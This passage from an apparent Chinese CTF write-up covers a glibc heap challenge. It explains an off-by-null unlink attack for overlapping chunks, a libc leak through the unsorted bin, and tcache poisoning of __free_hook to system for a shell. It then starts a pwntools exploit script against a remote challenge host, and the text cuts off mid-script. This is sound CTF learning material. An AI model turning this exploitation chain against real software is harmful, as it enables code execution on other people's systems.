分析
这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。
libc2.27解法
首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off by null,没有UAF。
然后由于create chunk的时候会在输入的内容后面加一个\x00,所以即便chunk在unsorted bin里踩出libc的地址也无法用show方法回显,因为会被\x00截断。
所以唯一的方法就是在create chunk之后想办法把libc地址踩到data里
因此考虑采用unlink攻击构造重叠的chunk。这样就可以得到两个相同的chunk,其中一个在heap_list里,另一个在unsorted_bin里,unsorted_bin里的那个副本会被踩出libc地址,这样show的时候,heap_list中的那个chunk就会打印出libc的地址。
之后就很容易了,修改tcache中chunk的fd指向__free_hook,修改__free_hook为system就好了,然后free被写入了"/bin/sh\x00"的chunk即可。
exp:
from pwn import *
#from LibcSearcher import *
import time
pe = "./timu"
arch = 'amd64'
context.update(arch=arch,os='linux',log_level='DEBUG')
context.terminal = ['tmux', 'splitw', '-h']
DEBUG = False
elf = ELF(pe)
if DEBUG:
if arch=='amd64':
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
r = process(pe)
else:
libc = ELF('./libc-2.23.so')
r = remote('220.249.52.134',43623)
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
ri = lambda :r.interactive()
info_addr = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(addr=0,PIE=True):
time.sleep(1)
if PIE:
#text_base = int(os.popen("pmap {}| awk '{
{print